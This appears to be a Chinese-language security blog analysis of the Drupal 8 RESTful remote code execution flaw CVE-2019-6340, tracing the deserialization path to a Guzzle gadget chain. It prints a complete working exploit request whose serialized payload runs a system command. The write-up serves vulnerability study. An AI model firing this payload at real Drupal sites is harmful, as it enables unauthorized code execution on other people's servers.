Drupal Core RESTful RCE (CVE-2019-6340)

近日，Drupal官方更新了一个非常关键的安全补丁，修复了因为接受的反序列化数据过滤不够严格，在开启RESTful Web Services拓展模块的情况下，可能导致PHP代码执行的严重安全。

漏洞条件

根据官方公告和自身实践，8.6.X(<8.6.10)两种情况可能导致问题出现：

• RESTful Web Services 拓展开启，并且启用了REST resources（默认配置即可），不需要区分GET，POST等方法即可完成攻击。JSON:API服务模块开启，此服务尚未分析。

攻击步骤

这里使用drupal-8.6.5作为测试版本，搭建REST服务进行漏洞分析

配置RESTful服务

在拓展中安装RESTful对应的WEB服务

RESTful服务开启后，对于REST resources的设置比较麻烦，安装REST UI拓展进行图形化的管理，方便查看（不安装也是可以的）。

RESTful服务开启后，其中/node/{node}这个REST resources是默认配置中就启用的，可以通过REST UI查看，发现确实如此，默认配置即可被攻击者利用。

攻击验证

发送包含whoami系统验证指令的攻击数据包

GET /drupal/node/1?_format=json HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/hal+json
Connection: close
Content-Length: 637
{
 "link": [
 {
 "value": "link",
 "options": "O:24:\\"GuzzleHttp\\\\Psr7\\\\FnStream\\":2:{s:33:\\"\\\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\\\u0000methods\\";a:1:{s:5:\\"close\\";a:2:{i:0;O:23:\\"GuzzleHttp\\\\HandlerStack\\":3:{s:32:\\"\\\\u0000GuzzleHttp\\\\HandlerStack\\\\u0000handler\\";s:6:\\"whoami\\";s:30:\\"\\\\u0000GuzzleHttp\\\\HandlerStack\\\\u0000stack\\";a:1:{i:0;a:1:{i:0;s:6:\\"system\\";}}s:31:\\"\\\\u0000GuzzleHttp\\\\HandlerStack\\\\u0000cached\\";b:0;}i:1;s:7:\\"resolve\\";}}s:9:\\"_fn_close\\";a:2:{i:0;r:4;i:1;s:7:\\"resolve\\";}}"
 }
 ],
 "_links": {
 "type": {
 "href": "http://127.0.0.1/drupal/rest/type/shortcut/default"
 }
 }
}

漏洞分析

官方公告中(现已修正)一开始仅仅说开启POST/PATCH两种请求方式才会收到攻击，其实并不区分类型，上图就是GET请求的攻击，因为程序在进入在对请求进行deserialize的时候，是还是通过php://input进行获取请求内容。

跟进$request->getContent

获得请求内容后，使用$this->serializer->decode对请求内容进行解码并赋值$unserialized。

然后传入$this->serializer->denormalize函数，Drupal 8的Serialization API是主要基于Symfony Serializer组件，具体可参加文档。

一路跟进直到getTypeInternalIds函数，检查url是否是网站已知的类型。

继续跟进，真正的判断在这个位置，函数栈如下：

继续跟进，将结果变量$typed_data_ids['entity_type']传入getEntityTypeDefinition函数，取实体的定义类型。

继续跟进，此时$context['target_instance']中包含Drupal\\Core\\Field\\FieldItemList的实例。

继续跟进，经过$items->appendItem()后，$context['target_instance']被重新赋值，此时包含Drupal\\link\\Plugin\\Field\\FieldType\\LinkItem的实例。

继续跟进，将$context['target_instance']中的实例赋值给$field_item，然后调用$field_item->setValue方法，并传入了$data。

data的值如下：

继续跟进setValue函数，这里的$values['options']可控，找到反序列化漏洞的触发点。

利用Drupal自带的Guzzle库，FnStream类的析构函数中包含call_user_func，进行利用链的构造。

欢迎来安全脉搏查看更多的干货文章和我们一起交流互动哦！

脉搏地址：安全脉搏 | 分享技术，悦享品质

微博地址:Sina Visitor System